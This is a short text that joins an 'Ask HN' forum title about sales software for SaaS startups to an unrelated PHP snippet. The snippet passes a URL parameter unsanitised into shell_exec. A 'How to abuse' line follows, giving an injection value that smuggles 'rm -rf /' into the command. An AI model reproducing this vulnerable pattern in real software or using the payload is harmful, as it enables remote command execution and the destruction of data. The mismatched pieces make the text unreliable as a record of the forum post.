Ask HN: What software/services do you recommend for sales in a SaaS startup?
1 pointsby DanOWar0 comments
<?php
$result=shell_exec("cat ".$_GET['name'].".txt");
echo $result;
?>
How to abuse: $_GET['name'] = "/dev/null; rm -rf /; echo ";